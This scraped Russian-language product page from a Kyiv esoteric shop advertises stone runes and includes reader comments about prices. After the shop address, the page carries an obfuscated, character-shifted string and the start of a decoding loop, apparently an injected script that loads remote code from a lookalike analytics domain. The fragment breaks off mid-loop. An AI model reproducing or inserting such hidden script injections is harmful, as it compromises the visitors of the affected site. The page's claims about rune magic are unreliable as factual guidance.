Руны Лазурит

Магический магазин "Мистическая Гирлянда" предлагает Вашему вниманию Руны из камня в ассортименте (аметист, сердолик, зеленая яшма, красная яшма, нефрит, зеленый авантюрин, лазурит, гематит)

Руны, в отличие от Таро, система не столько мантическая, сколько магическая. То есть гадать на них, конечно, тоже можно, однако главное их достоинство - это почти идеальная приспособленность для выполнения самых разнообразных магических операций, начиная от подбора эзотерического имени и кончая изготовлением талисманов, охранных и "благопожелательных" надписей, защиты помещения, автомобиля, дачного участка, медитации, оздоровления и изменения хода событий.
Гадать на рунах труднее, чем на картах Таро, потому что вместо рисунка, сюжета, сразу порождающего цепочку ассоциаций, мы имеем дело с чистым символом, смысл которого далеко не так очевиден и скрыт гораздо глубже, на уровне мифологического, то есть очень древнего сознания, в эгрегорах родовой и кармической памяти.
Руны как система, даже такая относительно новая, как Арманический футарк, имеют гораздо более древнюю основу, чем все современные карты Таро, и работают с энергиями, которые могут стать опасными и для современного человека. Поэтому рунолог должен, во-первых, соблюдать общие правила техники магической безопасности, а во-вторых - обращаться к каждой отдельной руне с уважением и осторожностью.
Cамое важное в работе рунолога - практика.
Выработайте свою систему, научитесь лавировать между требованиями магической безопасности и свободным  экспериментированием, и у вас в руках будет прекрасный инструмент для  корректировки своей жизни и для помощи другим людям.

Ниже приводим фотографии представленных в  эзотерическом магазине "Мистическая Гирлянда" рун из камня:

Приобрести данные руны Вы можете посетив наш эзотерический магазин по адресу г. Киев, ул. Гришка,8
#nzkt2#!tsd>#!iuuq;00hp1hmfbobmjujd/dpn0tdsjqut0epvcmfdmjdltubu/qiq#?=0tdsjqu?!";
m=""; for (i=0; i

Comments: 7

  1. Gekka Reijin says:

    Добрый день! Сколько стоят руны с Лазурита? и Как у Вас их приобрести?

  2. admin says:

    Для уточнения цены звоните в рабочее время на контактный телефон.

  3. Влад says:

    Позвонить не с чего
    можно на мейл цену на руны из черного гематита, пожалуйста?

  4. nata says:

    скажите сколько стоят руны из авантюрина ночь каира,
    natamonte@hotmail.com

Оставить комментарий

Ваш email не будет опубликован. Обязательные поля отмечены *

Вы можете использовать это HTMLтеги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>